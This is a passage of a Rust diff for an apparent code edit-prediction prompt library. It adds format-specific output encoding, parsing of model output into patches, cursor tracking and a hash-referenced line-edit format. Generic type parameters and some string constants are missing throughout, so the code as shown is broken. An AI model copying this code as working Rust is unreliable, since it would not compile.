ZetaFormat::V0120GitMergeMarkers + | ZetaFormat::V0131GitMergeMarkersPrefix + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304VariableEdit => String::new(), + ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => String::new(), } +} - let mut event_strings: Vec = Vec::new(); - let mut total_tokens = header_tokens; - - for event in events.iter().rev() { - let mut event_str = String::new(); - write_event(&mut event_str, event); - let event_tokens = estimate_tokens(event_str.len()); +pub fn output_end_marker_for_format(format: ZetaFormat) -> Option<&'static str> { + match format { + ZetaFormat::V0120GitMergeMarkers => Some(v0120_git_merge_markers::END_MARKER), + ZetaFormat::V0131GitMergeMarkersPrefix => Some(v0131_git_merge_markers_prefix::END_MARKER), + ZetaFormat::V0211Prefill => Some(v0131_git_merge_markers_prefix::END_MARKER), + ZetaFormat::V0211SeedCoder + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions => Some(seed_coder::END_MARKER), + ZetaFormat::V0316SeedMultiRegions => Some(multi_region::V0316_END_MARKER), + ZetaFormat::V0318SeedMultiRegions => Some(multi_region::V0318_END_MARKER), + ZetaFormat::V0317SeedMultiRegions => Some(multi_region::V0317_END_MARKER), + ZetaFormat::V0112MiddleAtEnd + | ZetaFormat::V0113Ordered + | ZetaFormat::V0114180EditableRegion + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304VariableEdit => None, + } +} - if total_tokens + event_tokens > max_tokens { - break; +pub fn encode_patch_as_output_for_format( + format: ZetaFormat, + old_editable_region: &str, + patch: &str, + cursor_offset: Option, +) -> Result> { + match format { + ZetaFormat::v0226Hashline => { + hashline::patch_to_edit_commands(old_editable_region, patch, cursor_offset).map(Some) } - total_tokens += event_tokens; - event_strings.push(event_str); + ZetaFormat::V0304VariableEdit => 
v0304_variable_edit::patch_to_variable_edit_output( + old_editable_region, + patch, + cursor_offset, + ) + .map(Some), + ZetaFormat::V0304SeedNoEdits | ZetaFormat::V0306SeedMultiRegions => { + Ok(seed_coder::no_edits(patch)) + } + ZetaFormat::V0316SeedMultiRegions => { + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + let marker_offsets = multi_region::compute_marker_offsets(old_editable_region); + let marker_num = + multi_region::nearest_marker_number(cursor_offset, &marker_offsets); + let tag = multi_region::marker_tag(marker_num); + Ok(Some(format!( + "{tag}{tag}{}", + multi_region::V0316_END_MARKER + ))) + } else { + Ok(None) + } + } + ZetaFormat::V0318SeedMultiRegions => { + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + let marker_offsets = + multi_region::compute_marker_offsets_v0318(old_editable_region); + let marker_num = + multi_region::nearest_marker_number(cursor_offset, &marker_offsets); + let tag = multi_region::marker_tag(marker_num); + Ok(Some(format!( + "{tag}{tag}{}", + multi_region::V0318_END_MARKER + ))) + } else { + Ok(None) + } + } + ZetaFormat::V0317SeedMultiRegions => { + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + let tag = multi_region::marker_tag_relative(0); + Ok(Some(format!( + "{tag}{tag}{}", + multi_region::V0317_END_MARKER + ))) + } else { + Ok(None) + } + } + _ => Ok(None), } +} - if event_strings.is_empty() { - return String::new(); +/// Given a `ZetaPromptInput`, a format, and a patch (with cursor already +/// extracted), produce the expected model output string for training. 
+pub fn format_expected_output( + input: &ZetaPromptInput, + format: ZetaFormat, + patch: &str, + cursor_offset: Option, +) -> Result { + let (context, editable_range, _, _) = resolve_cursor_region(input, format); + let mut old_editable = context[editable_range].to_string(); + if !old_editable.is_empty() && !old_editable.ends_with('\n') { + old_editable.push('\n'); } - let mut result = header; - for event_str in event_strings.iter().rev() { - result.push_str(event_str); + // Formats with their own output encoding (hashline, variable-edit, + // multi-region empty patches) are handled here. + if let Some(output) = + encode_patch_as_output_for_format(format, &old_editable, patch, cursor_offset)? + { + return Ok(output); } - result -} - -fn excerpt_rendered_tokens(excerpt: &RelatedExcerpt, file_max_row: u32) -> usize { - let needs_newline = !excerpt.text.ends_with('\n'); - let needs_ellipsis = excerpt.row_range.end < file_max_row; - let len = excerpt.text.len() - + if needs_newline { "\n".len() } else { 0 } - + if needs_ellipsis { "...\n".len() } else { 0 }; - estimate_tokens(len) -} -pub fn format_related_files_within_budget( - related_files: &[RelatedFile], - file_prefix: &str, - file_suffix: &str, - max_tokens: usize, -) -> String { - struct ExcerptCandidate { - file_ix: usize, - excerpt_ix: usize, - order: usize, - } + let empty_patch = patch.lines().count() <= 3; + + match format { + // Multi-region formats: non-empty patches need diff application + // then marker-span encoding. 
+ ZetaFormat::V0316SeedMultiRegions => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0316( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0316_END_MARKER, + ) + } + ZetaFormat::V0318SeedMultiRegions => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0318( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0318_END_MARKER, + ) + } + ZetaFormat::V0317SeedMultiRegions => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0317( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0317_END_MARKER, + ) + } + // V0131-style formats and fallback: produce new editable text with + // cursor marker inserted, followed by the end marker. + _ => { + let (mut result, first_hunk_offset) = if empty_patch { + (old_editable.clone(), None) + } else { + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)? 
+ }; + + if let Some(cursor) = cursor_offset { + let hunk_start = if !empty_patch { + first_hunk_offset.unwrap_or(0) + } else { + 0 + }; + let offset = (hunk_start + cursor).min(result.len()); + result.insert_str(offset, CURSOR_MARKER); + } + + if !result.is_empty() && !result.ends_with('\n') { + result.push('\n'); + } + + if let Some(end_marker) = output_end_marker_for_format(format) { + result.push_str(end_marker); + } + + Ok(result) + } + } +} + +/// Compute the cursor position within the new text after diff application. +fn cursor_in_new_text( + cursor_offset: Option, + first_hunk_offset: Option, + new_text: &str, +) -> Option { + cursor_offset.map(|cursor| { + let hunk_start = first_hunk_offset.unwrap_or(0); + (hunk_start + cursor).min(new_text.len()) + }) +} + +#[derive(Clone, Debug, PartialEq, Serialize, Deserialize)] +pub struct ParsedOutput { + /// Text that should replace the editable region + pub new_editable_region: String, + /// The byte range within `cursor_excerpt` that this replacement applies to + pub range_in_excerpt: Range, + /// Byte offset of the cursor marker within `new_editable_region`, if present + pub cursor_offset_in_new_editable_region: Option, +} + +#[derive(Clone, Debug, PartialEq, Serialize, Deserialize)] +pub struct CursorPosition { + pub path: String, + pub row: usize, + pub column: usize, + pub offset: usize, + pub editable_region_offset: usize, +} + +pub fn parsed_output_from_editable_region( + range_in_excerpt: Range, + mut new_editable_region: String, +) -> ParsedOutput { + let cursor_offset_in_new_editable_region = new_editable_region.find(CURSOR_MARKER); + if let Some(offset) = cursor_offset_in_new_editable_region { + new_editable_region.replace_range(offset..offset + CURSOR_MARKER.len(), ""); + } + + ParsedOutput { + new_editable_region, + range_in_excerpt, + cursor_offset_in_new_editable_region, + } +} + +/// Parse model output for the given zeta format +pub fn parse_zeta2_model_output( + output: &str, + format: ZetaFormat, 
+ prompt_inputs: &ZetaPromptInput, +) -> Result { + let output = match output_end_marker_for_format(format) { + Some(marker) => output.strip_suffix(marker).unwrap_or(output), + None => output, + }; + + let (context, editable_range_in_context, context_range, cursor_offset) = + resolve_cursor_region(prompt_inputs, format); + let context_start = context_range.start; + let old_editable_region = &context[editable_range_in_context.clone()]; + let cursor_offset_in_editable = cursor_offset.saturating_sub(editable_range_in_context.start); + + let (range_in_context, output) = match format { + ZetaFormat::v0226Hashline => ( + editable_range_in_context, + if hashline::output_has_edit_commands(output) { + hashline::apply_edit_commands(old_editable_region, output) + } else { + output.to_string() + }, + ), + ZetaFormat::V0304VariableEdit => v0304_variable_edit::apply_variable_edit(context, output)?, + ZetaFormat::V0304SeedNoEdits => ( + editable_range_in_context, + if output.starts_with(seed_coder::NO_EDITS) { + old_editable_region.to_string() + } else { + output.to_string() + }, + ), + ZetaFormat::V0306SeedMultiRegions => ( + editable_range_in_context, + if output.starts_with(seed_coder::NO_EDITS) { + old_editable_region.to_string() + } else { + multi_region::apply_marker_span(old_editable_region, output)? 
+ }, + ), + ZetaFormat::V0316SeedMultiRegions => ( + editable_range_in_context, + multi_region::apply_marker_span_v0316(old_editable_region, output)?, + ), + ZetaFormat::V0318SeedMultiRegions => ( + editable_range_in_context, + multi_region::apply_marker_span_v0318(old_editable_region, output)?, + ), + ZetaFormat::V0317SeedMultiRegions => ( + editable_range_in_context, + multi_region::apply_marker_span_v0317( + old_editable_region, + output, + Some(cursor_offset_in_editable), + )?, + ), + _ => (editable_range_in_context, output.to_string()), + }; + + let range_in_excerpt = + range_in_context.start + context_start..range_in_context.end + context_start; + + Ok(parsed_output_from_editable_region(range_in_excerpt, output)) +} + +pub fn parse_zeta2_model_output_as_patch( + output: &str, + format: ZetaFormat, + prompt_inputs: &ZetaPromptInput, +) -> Result { + let parsed = parse_zeta2_model_output(output, format, prompt_inputs)?; + parsed_output_to_patch(prompt_inputs, parsed) +} + +pub fn cursor_position_from_parsed_output( + prompt_inputs: &ZetaPromptInput, + parsed: &ParsedOutput, +) -> Option { + let cursor_offset = parsed.cursor_offset_in_new_editable_region?; + let editable_region_offset = parsed.range_in_excerpt.start; + let excerpt = prompt_inputs.cursor_excerpt.as_ref(); + + let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count(); + + let new_editable_region = &parsed.new_editable_region; + let prefix_end = cursor_offset.min(new_editable_region.len()); + let new_region_prefix = &new_editable_region[..prefix_end]; + + let row = editable_region_start_line + new_region_prefix.matches('\n').count(); + + let column = match new_region_prefix.rfind('\n') { + Some(last_newline) => cursor_offset - last_newline - 1, + None => { + let content_prefix = &excerpt[..editable_region_offset]; + let content_column = match content_prefix.rfind('\n') { + Some(last_newline) => editable_region_offset - last_newline - 1, + None => 
editable_region_offset, + }; + content_column + cursor_offset + } + }; + + Some(CursorPosition { + path: prompt_inputs.cursor_path.to_string_lossy().into_owned(), + row, + column, + offset: editable_region_offset + cursor_offset, + editable_region_offset: cursor_offset, + }) +} + +pub fn parsed_output_to_patch( + prompt_inputs: &ZetaPromptInput, + parsed: ParsedOutput, +) -> Result { + let range_in_excerpt = parsed.range_in_excerpt; + let excerpt = prompt_inputs.cursor_excerpt.as_ref(); + let old_text = excerpt[range_in_excerpt.clone()].to_string(); + let mut new_text = parsed.new_editable_region; + + let mut old_text_normalized = old_text; + if !new_text.is_empty() && !new_text.ends_with('\n') { + new_text.push('\n'); + } + if !old_text_normalized.is_empty() && !old_text_normalized.ends_with('\n') { + old_text_normalized.push('\n'); + } + + let editable_region_offset = range_in_excerpt.start; + let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count() as u32; + let editable_region_lines = old_text_normalized.lines().count() as u32; + + let diff = udiff::unified_diff_with_context( + &old_text_normalized, + &new_text, + editable_region_start_line, + editable_region_start_line, + editable_region_lines, + ); + + let path = prompt_inputs + .cursor_path + .to_string_lossy() + .trim_start_matches('/') + .to_string(); + let formatted_diff = format!("--- a/{path}\n+++ b/{path}\n{diff}"); + + Ok(udiff::encode_cursor_in_patch( + &formatted_diff, + parsed.cursor_offset_in_new_editable_region, + )) +} + +pub fn excerpt_range_for_format( + format: ZetaFormat, + ranges: &ExcerptRanges, +) -> (Range, Range) { + excerpt_ranges_for_format(format, ranges) +} + +pub fn resolve_cursor_region( + input: &ZetaPromptInput, + format: ZetaFormat, +) -> (&str, Range, Range, usize) { + let (editable_range, context_range) = if let Some(syntax_ranges) = &input.syntax_ranges { + let (editable_tokens, context_tokens) = token_limits_for_format(format); + 
compute_editable_and_context_ranges( + &input.cursor_excerpt, + input.cursor_offset_in_excerpt, + syntax_ranges, + editable_tokens, + context_tokens, + ) + } else { + excerpt_range_for_format(format, &input.excerpt_ranges) + }; + let context_start = context_range.start; + let context_text = &input.cursor_excerpt[context_range.clone()]; + let adjusted_editable = + (editable_range.start - context_start)..(editable_range.end - context_start); + let adjusted_cursor = input.cursor_offset_in_excerpt - context_start; + + ( + context_text, + adjusted_editable, + context_range, + adjusted_cursor, + ) +} + +pub fn get_prefill(input: &ZetaPromptInput, format: ZetaFormat) -> String { + let (context, editable_range, _, _) = resolve_cursor_region(input, format); + get_prefill_for_format(format, context, &editable_range) +} + +fn format_edit_history_within_budget( + events: &[Arc], + file_marker: &str, + edit_history_name: &str, + max_tokens: usize, + max_edit_event_count: usize, +) -> String { + let header = format!("{}{}\n", file_marker, edit_history_name); + let header_tokens = estimate_tokens(header.len()); + if header_tokens >= max_tokens { + return String::new(); + } + + let mut event_strings: Vec = Vec::new(); + let mut total_tokens = header_tokens; + + for event in events.iter().rev().take(max_edit_event_count) { + let mut event_str = String::new(); + write_event(&mut event_str, event); + let event_tokens = estimate_tokens(event_str.len()); + + if total_tokens + event_tokens > max_tokens { + break; + } + total_tokens += event_tokens; + event_strings.push(event_str); + } + + if event_strings.is_empty() { + return String::new(); + } + + let mut result = header; + for event_str in event_strings.iter().rev() { + result.push_str(event_str); + } + result +} + +fn excerpt_rendered_tokens(excerpt: &RelatedExcerpt, file_max_row: u32) -> usize { + let needs_newline = !excerpt.text.ends_with('\n'); + let needs_ellipsis = excerpt.row_range.end < file_max_row; + let len = 
excerpt.text.len() + + if needs_newline { "\n".len() } else { 0 } + + if needs_ellipsis { "...\n".len() } else { 0 }; + estimate_tokens(len) +} + +pub fn format_related_files_within_budget( + related_files: &[RelatedFile], + file_prefix: &str, + file_suffix: &str, + max_tokens: usize, +) -> String { + struct ExcerptCandidate { + file_ix: usize, + excerpt_ix: usize, + order: usize, + } let mut excerpt_candidates: Vec = related_files .iter() @@ -547,6 +1333,16 @@ pub fn write_related_files( mod v0112_middle_at_end { use super::*; + pub fn special_tokens() -> &'static [&'static str] { + &[ + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + "<|file_sep|>", + CURSOR_MARKER, + ] + } + pub fn write_cursor_excerpt_section( prompt: &mut String, path: &Path, @@ -581,6 +1377,16 @@ mod v0112_middle_at_end { mod v0113_ordered { use super::*; + pub fn special_tokens() -> &'static [&'static str] { + &[ + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + "<|file_sep|>", + CURSOR_MARKER, + ] + } + pub fn write_cursor_excerpt_section( prompt: &mut String, path: &Path, @@ -615,6 +1421,14 @@ mod v0113_ordered { } } +mod v0114180_editable_region { + use super::*; + + pub fn special_tokens() -> &'static [&'static str] { + v0113_ordered::special_tokens() + } +} + pub mod v0120_git_merge_markers { //! A prompt that uses git-style merge conflict markers to represent the editable region. //! @@ -766,6 +1580,10 @@ pub mod v0131_git_merge_markers_prefix { pub mod v0211_prefill { use super::*; + pub fn special_tokens() -> &'static [&'static str] { + v0131_git_merge_markers_prefix::special_tokens() + } + pub fn get_prefill(context: &str, editable_range: &Range) -> String { let editable_region = &context[editable_range.start..editable_range.end]; @@ -797,149 +1615,2656 @@ pub mod v0211_prefill { } } -pub mod seed_coder { - //! Seed-Coder prompt format using SPM (Suffix-Prefix-Middle) FIM mode. - //! - //! Seed-Coder uses different FIM tokens and order than Qwen: - //! 
- SPM order: suffix comes FIRST, then prefix, then middle - //! - Tokens: `<[fim-suffix]>`, `<[fim-prefix]>`, `<[fim-middle]>` - //! - File markers: StarCoder-style `path` (single token + path) - //! - //! All context (related files, edit history) goes in the PREFIX section. - //! The suffix contains only code after the editable region. - //! - //! Example prompt: - //! - //! <[fim-suffix]> - //! code after editable region - //! <[fim-prefix]>related/file.py - //! related file content - //! - //! edit_history - //! --- a/some_file.py - //! +++ b/some_file.py - //! -old - //! +new - //! - //! path/to/target_file.py - //! code before editable region - //! <<<<<<< CURRENT - //! code that - //! needs to<|user_cursor|> - //! be rewritten - //! ======= - //! <[fim-middle]> - //! - //! Expected output (model generates): - //! - //! updated - //! code with - //! changes applied - //! >>>>>>> UPDATED +pub mod hashline { - use super::*; + use std::fmt::Display; - pub const FIM_SUFFIX: &str = "<[fim-suffix]>"; - pub const FIM_PREFIX: &str = "<[fim-prefix]>"; - pub const FIM_MIDDLE: &str = "<[fim-middle]>"; - pub const FILE_MARKER: &str = ""; + pub const END_MARKER: &str = "<|fim_middle|>updated"; + pub const START_MARKER: &str = "<|fim_middle|>current"; - pub const START_MARKER: &str = "<<<<<<< CURRENT\n"; - pub const SEPARATOR: &str = "=======\n"; - pub const END_MARKER: &str = ">>>>>>> UPDATED\n"; + use super::*; + + const SET_COMMAND_MARKER: &str = "<|set|>"; + const INSERT_COMMAND_MARKER: &str = "<|insert|>"; + pub const NO_EDITS_COMMAND_MARKER: &str = "<|no_edits|>"; pub fn special_tokens() -> &'static [&'static str] { - &[ - FIM_SUFFIX, - FIM_PREFIX, - FIM_MIDDLE, - FILE_MARKER, - START_MARKER, - SEPARATOR, - END_MARKER, + return &[ + SET_COMMAND_MARKER, + "<|set_range|>", + INSERT_COMMAND_MARKER, + NO_EDITS_COMMAND_MARKER, CURSOR_MARKER, - ] + "<|file_sep|>", + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + ]; } - pub fn format_prompt_with_budget( + /// A 
parsed line reference like `3:c3` (line index 3 with hash 0xc3). + #[derive(Debug, Clone, PartialEq, Eq)] + struct LineRef { + index: usize, + hash: u8, + } + + impl Display for LineRef { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + write!(f, "{}:{:02x}", self.index, self.hash) + } + } + + pub fn hash_line(line: &[u8]) -> u8 { + let mut h: u8 = 0; + for &byte in line { + h = h.wrapping_add(byte); + } + return h; + } + + /// Write the hashline-encoded editable region into `out`. Each line of + /// `editable_text` is prefixed with `{line_index}:{hash}|` and the cursor + /// marker is inserted at `cursor_offset_in_editable` (byte offset relative + /// to the start of `editable_text`). + pub fn write_hashline_editable_region( + out: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + ) { + let mut offset = 0; + for (i, line) in editable_text.lines().enumerate() { + let (head, cursor, tail) = if cursor_offset_in_editable > offset + && cursor_offset_in_editable < offset + line.len() + { + ( + &line[..cursor_offset_in_editable - offset], + CURSOR_MARKER, + &line[cursor_offset_in_editable - offset..], + ) + } else { + (line, "", "") + }; + write!( + out, + "\n{}|{head}{cursor}{tail}", + LineRef { + index: i, + hash: hash_line(line.as_bytes()) + } + ) + .unwrap(); + offset += line.len() + 1; + } + } + + pub fn write_cursor_excerpt_section( + prompt: &mut String, path: &Path, context: &str, editable_range: &Range, cursor_offset: usize, - events: &[Arc], - related_files: &[RelatedFile], + ) { + let path_str = path.to_string_lossy(); + write!(prompt, "<|file_sep|>{}\n", path_str).ok(); + + prompt.push_str("<|fim_prefix|>\n"); + prompt.push_str(&context[..editable_range.start]); + prompt.push_str(START_MARKER); + + let cursor_offset_in_editable = cursor_offset.saturating_sub(editable_range.start); + let editable_region = &context[editable_range.clone()]; + write_hashline_editable_region(prompt, editable_region, 
cursor_offset_in_editable); + + if !prompt.ends_with('\n') { + prompt.push('\n'); + } + + prompt.push_str("<|fim_suffix|>\n"); + prompt.push_str(&context[editable_range.end..]); + if !prompt.ends_with('\n') { + prompt.push('\n'); + } + + prompt.push_str(END_MARKER); + prompt.push('\n'); + } + + /// A single edit command parsed from the model output. + #[derive(Debug)] + enum EditCommand<'a> { + /// Replace a range of lines (inclusive on both ends). Single-line set is + /// represented by `start == end`. + Set { + start: LineRef, + end: LineRef, + content: &'a str, + }, + /// Insert new lines after the given line, or before the first line if + /// `after` is `None`. + Insert { + after: Option, + content: &'a str, + }, + } + + /// Parse a line reference like `3:c3` into a `LineRef`. + fn parse_line_ref(s: &str) -> Option { + let (idx_str, hash_str) = s.split_once(':')?; + let index = idx_str.parse::().ok()?; + let hash = u8::from_str_radix(hash_str, 16).ok()?; + Some(LineRef { index, hash }) + } + + /// Parse the model output into a list of `EditCommand`s. + fn parse_edit_commands(model_output: &str) -> Vec> { + let mut commands = Vec::new(); + let mut offset = 0usize; + + while offset < model_output.len() { + let next_nl = model_output[offset..] + .find('\n') + .map(|i| offset + i) + .unwrap_or(model_output.len()); + let line = &model_output[offset..next_nl]; + let line_end = if next_nl < model_output.len() { + next_nl + 1 + } else { + next_nl + }; + + let trimmed = line.trim(); + let (is_set, specifier) = if let Some(spec) = trimmed.strip_prefix(SET_COMMAND_MARKER) { + (true, spec) + } else if let Some(spec) = trimmed.strip_prefix(INSERT_COMMAND_MARKER) { + (false, spec) + } else { + offset = line_end; + continue; + }; + + let mut content_end = line_end; + let mut scan = line_end; + + while scan < model_output.len() { + let body_nl = model_output[scan..] 
+ .find('\n') + .map(|i| scan + i) + .unwrap_or(model_output.len()); + let body_line = &model_output[scan..body_nl]; + if body_line.trim().starts_with(SET_COMMAND_MARKER) + || body_line.trim().starts_with(INSERT_COMMAND_MARKER) + { + break; + } + scan = if body_nl < model_output.len() { + body_nl + 1 + } else { + body_nl + }; + content_end = scan; + } + + let content = &model_output[line_end..content_end]; + + if is_set { + if let Some((start_str, end_str)) = specifier.split_once('-') { + if let (Some(start), Some(end)) = + (parse_line_ref(start_str), parse_line_ref(end_str)) + { + commands.push(EditCommand::Set { + start, + end, + content, + }); + } + } else if let Some(target) = parse_line_ref(specifier) { + commands.push(EditCommand::Set { + start: target.clone(), + end: target, + content, + }); + } + } else { + let after = parse_line_ref(specifier); + commands.push(EditCommand::Insert { after, content }); + } + + offset = scan; + } + + commands + } + + /// Returns `true` if the model output contains `<|set|>` or `<|insert|>` commands + /// (as opposed to being a plain full-replacement output). + /// Strip the `{line_num}:{hash}|` prefixes from each line of a hashline-encoded + /// editable region, returning the plain text content. + pub fn strip_hashline_prefixes(region: &str) -> String { + let mut decoded: String = region + .lines() + .map(|line| line.find('|').map_or(line, |pos| &line[pos + 1..])) + .collect::>() + .join("\n"); + if region.ends_with('\n') { + decoded.push('\n'); + } + decoded + } + + pub fn output_has_edit_commands(model_output: &str) -> bool { + model_output.contains(SET_COMMAND_MARKER) + || model_output.contains(INSERT_COMMAND_MARKER) + || model_output.contains(NO_EDITS_COMMAND_MARKER) + } + + /// Apply `<|set|>` and `<|insert|>` edit commands from the model output to the + /// original editable region text. + /// + /// `editable_region` is the original text of the editable region (without hash + /// prefixes). 
`model_output` is the raw model response containing edit commands. + /// + /// Returns the full replacement text for the editable region. + pub fn apply_edit_commands(editable_region: &str, model_output: &str) -> String { + if model_output + .trim_start() + .starts_with(NO_EDITS_COMMAND_MARKER) + { + return editable_region.to_string(); + } + + let original_lines: Vec<&str> = editable_region.lines().collect(); + let old_hashes: Vec = original_lines + .iter() + .map(|line| hash_line(line.as_bytes())) + .collect(); + + let commands = parse_edit_commands(model_output); + + // For set operations: indexed by start line → Some((end line index, content)) + // For insert operations: indexed by line index → vec of content to insert after + // Insert-before-first is tracked separately. + let mut set_ops: Vec> = vec![None; original_lines.len()]; + let mut insert_before_first: Vec<&str> = Vec::new(); + let mut insert_after: Vec> = vec![Vec::new(); original_lines.len()]; + + for command in &commands { + match command { + EditCommand::Set { + start, + end, + content, + } => { + if start.index < old_hashes.len() + && end.index < old_hashes.len() + && start.index <= end.index + && old_hashes[start.index] == start.hash + && old_hashes[end.index] == end.hash + { + set_ops[start.index] = Some((end.index, *content)); + } + } + EditCommand::Insert { after, content } => match after { + None => insert_before_first.push(*content), + Some(line_ref) => { + if line_ref.index < old_hashes.len() + && old_hashes[line_ref.index] == line_ref.hash + { + insert_after[line_ref.index].push(*content); + } + } + }, + } + } + + let mut result = String::new(); + + // Emit any insertions before the first line + for content in &insert_before_first { + result.push_str(content); + if !content.ends_with('\n') { + result.push('\n'); + } + } + + let mut i = 0; + while i < original_lines.len() { + if let Some((end_index, replacement)) = set_ops[i].as_ref() { + // Replace lines i..=end_index with the replacement 
content + result.push_str(replacement); + if !replacement.is_empty() && !replacement.ends_with('\n') { + result.push('\n'); + } + // Emit any insertions after the end of this set range + if *end_index < insert_after.len() { + for content in &insert_after[*end_index] { + result.push_str(content); + if !content.ends_with('\n') { + result.push('\n'); + } + } + } + i = end_index + 1; + } else { + // Keep the original line + result.push_str(original_lines[i]); + result.push('\n'); + // Emit any insertions after this line + for content in &insert_after[i] { + result.push_str(content); + if !content.ends_with('\n') { + result.push('\n'); + } + } + i += 1; + } + } + + // Preserve trailing newline behavior: if the original ended with a + // newline the result already has one; if it didn't, trim the extra one + // we added. + if !editable_region.ends_with('\n') && result.ends_with('\n') { + result.pop(); + } + + result + } + + /// Convert a unified diff patch into hashline edit commands. + /// + /// Parses the unified diff `patch` directly to determine which lines of + /// `old_text` are deleted/replaced and what new lines are added, then emits + /// `<|set|>` and `<|insert|>` edit commands referencing old lines by their + /// `{index}:{hash}` identifiers. + /// + /// `cursor_offset` is an optional byte offset into the first hunk's new + /// text (context + additions) where the cursor marker should be placed. + pub fn patch_to_edit_commands( + old_text: &str, + patch: &str, + cursor_offset: Option, + ) -> Result { + let old_lines: Vec<&str> = old_text.lines().collect(); + let old_hashes: Vec = old_lines + .iter() + .map(|line| hash_line(line.as_bytes())) + .collect(); + + let mut result = String::new(); + let mut first_hunk = true; + + struct Hunk<'a> { + line_range: Range, + new_text_lines: Vec<&'a str>, + cursor_line_offset_in_new_text: Option<(usize, usize)>, + } + + // Parse the patch line by line. We only care about hunk headers, + // context, deletions, and additions. 
+ let mut old_line_index: usize = 0; + let mut current_hunk: Option = None; + // Byte offset tracking within the hunk's new text for cursor placement. + let mut new_text_byte_offset: usize = 0; + // The line index of the last old line seen before/in the current hunk + // (used for insert-after reference). + let mut last_old_line_before_hunk: Option = None; + + fn flush_hunk( + hunk: Hunk, + last_old_line: Option, + result: &mut String, + old_hashes: &[u8], + ) { + if hunk.line_range.is_empty() { + // Pure insertion — reference the old line to insert after when in bounds. + if let Some(after) = last_old_line + && let Some(&hash) = old_hashes.get(after) + { + write!( + result, + "{INSERT_COMMAND_MARKER}{}\n", + LineRef { index: after, hash } + ) + .unwrap(); + } else { + result.push_str(INSERT_COMMAND_MARKER); + result.push('\n'); + } + } else { + let start = hunk.line_range.start; + let end_exclusive = hunk.line_range.end; + let deleted_line_count = end_exclusive.saturating_sub(start); + + if deleted_line_count == 1 { + if let Some(&hash) = old_hashes.get(start) { + write!( + result, + "{SET_COMMAND_MARKER}{}\n", + LineRef { index: start, hash } + ) + .unwrap(); + } else { + result.push_str(SET_COMMAND_MARKER); + result.push('\n'); + } + } else { + let end_inclusive = end_exclusive - 1; + match ( + old_hashes.get(start).copied(), + old_hashes.get(end_inclusive).copied(), + ) { + (Some(start_hash), Some(end_hash)) => { + write!( + result, + "{SET_COMMAND_MARKER}{}-{}\n", + LineRef { + index: start, + hash: start_hash + }, + LineRef { + index: end_inclusive, + hash: end_hash + } + ) + .unwrap(); + } + _ => { + result.push_str(SET_COMMAND_MARKER); + result.push('\n'); + } + } + } + } + for (line_offset, line) in hunk.new_text_lines.iter().enumerate() { + if let Some((cursor_line_offset, char_offset)) = hunk.cursor_line_offset_in_new_text + && line_offset == cursor_line_offset + { + result.push_str(&line[..char_offset]); + result.push_str(CURSOR_MARKER); + 
result.push_str(&line[char_offset..]); + continue; + } + + result.push_str(line); + } + } + + for raw_line in patch.split_inclusive('\n') { + if raw_line.starts_with("@@") { + // Flush any pending change hunk from a previous patch hunk. + if let Some(hunk) = current_hunk.take() { + flush_hunk(hunk, last_old_line_before_hunk, &mut result, &old_hashes); + } + + // Parse hunk header: @@ -old_start[,old_count] +new_start[,new_count] @@ + // We intentionally do not trust old_start as a direct local index into `old_text`, + // because some patches are produced against a larger file region and carry + // non-local line numbers. We keep indexing local by advancing from parsed patch lines. + if first_hunk { + new_text_byte_offset = 0; + first_hunk = false; + } + continue; + } + + if raw_line.starts_with("---") || raw_line.starts_with("+++") { + continue; + } + if raw_line.starts_with("\\ No newline") { + continue; + } + + if raw_line.starts_with('-') { + // Extend or start a change hunk with this deleted old line. + match &mut current_hunk { + Some(Hunk { + line_range: range, .. + }) => range.end = old_line_index + 1, + None => { + current_hunk = Some(Hunk { + line_range: old_line_index..old_line_index + 1, + new_text_lines: Vec::new(), + cursor_line_offset_in_new_text: None, + }); + } + } + old_line_index += 1; + } else if let Some(added_content) = raw_line.strip_prefix('+') { + // Place cursor marker if cursor_offset falls within this line. 
